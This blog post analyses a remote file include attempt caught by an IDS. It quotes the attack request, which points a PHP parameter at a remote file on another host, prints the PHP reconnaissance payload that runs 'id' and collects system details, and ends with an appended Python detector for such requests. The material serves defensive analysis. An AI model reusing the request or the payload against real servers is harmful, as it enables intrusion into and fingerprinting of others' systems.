MrNeti Tries to Enter the House
This was an interesting one: I just ran across this alert from my IDS:
66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252
It seems someone is trying to get the script to include and execute an arbitrary remote file (the DOCUMENT_ROOT parameter points at a URL). Tracking down that file, I found it contained the following code:
<?php
// Buckets by the number of digits in $number rather than its value (kept as in the original).
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number/1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number/1024/1024);
    }
    return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "MrNETi<br>";
$un = @php_uname();
// The original used the bare word id; older PHP treated that as the string "id".
// system() prints the command output directly and also returns its last line.
$id1 = system('id');
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;
// Fingerprint of the host: kernel, OS, web server user, disk usage.
echo "MrNETi<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
Now, if this code were to execute (on my Linux VMware image) it would produce the following output:
MrNETi
uid=74(apache) gid=74(apache) groups=74(apache) MrNETi
uname -a: Linux localhost 2.6.22.12-desktop586-1mdv #1 SMP Tue Nov 20 08:09:17 EST 2007 i686
os: Linux
id: uid=74(apache) gid=74(apache) groups=74(apache)
free: 3.46 Gb
used: 4.22 Gb
total: 7.68 Gb
This looks like a pretty basic reconnaissance script. Keep an eye out for it though; its presence may lead to nastier attacks. At the very least, if you see this content going over your wire, you know a remote file include vulnerability exists and has been exploited.
I did a little checking and couldn't find any known systems that utilize e404.php that could be vulnerable to a file include attack, but I'm sure one is out there if folks are searching for it.
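A small log-scanning routine for the kind of request shown in the alert above, added here as an example (this is not code from the original post): it parses Apache combined-log lines and flags any query parameter whose decoded value is a remote URL or a PHP stream wrapper, which is the signature of a remote file include attempt. The first sample line is the alert from the post; the other lines and the addresses in them are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log: client, identd, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes PHP will include() from when allow_url_include is on:
# http/https/ftp plus the data:// and php:// stream wrappers.
REMOTE_SCHEME = re.compile(r'^(https?|ftps?|data|php)://', re.IGNORECASE)

def rfi_params(target):
    """Return [(param, decoded_value)] for every query parameter whose value
    names a remote resource. parse_qsl decodes one layer of percent-encoding;
    the extra unquote() also catches double-encoded values such as http%253A%2F%2F."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)
        if REMOTE_SCHEME.match(decoded):
            hits.append((name, decoded))
    return hits

def scan_log(lines):
    """Return (ip, timestamp, status, param, url) for each request carrying an RFI-style value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than crash
        for name, url in rfi_params(m.group('target')):
            findings.append((m.group('ip'), m.group('ts'), int(m.group('status')), name, url))
    return findings

# First line is the alert quoted in the post; the others are constructed for this example.
SAMPLE_LOG = [
    '66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252',
    '192.0.2.10 - - [30/Jul/2008:04:33:01 -0400] "GET /index.php?page=about&id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jul/2008:04:35:12 -0400] "GET /index.php?page=HTTP%253A%2F%2Fexample.invalid%2Fs.txt HTTP/1.1" 200 4100',
]

if __name__ == '__main__':
    for ip, ts, status, name, url in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} status={status} param={name} -> {url}')
```

Note that the 404 on the original request does not mean the attempt failed harmlessly everywhere: a status of 200 against a vulnerable script is what to treat as a likely compromise.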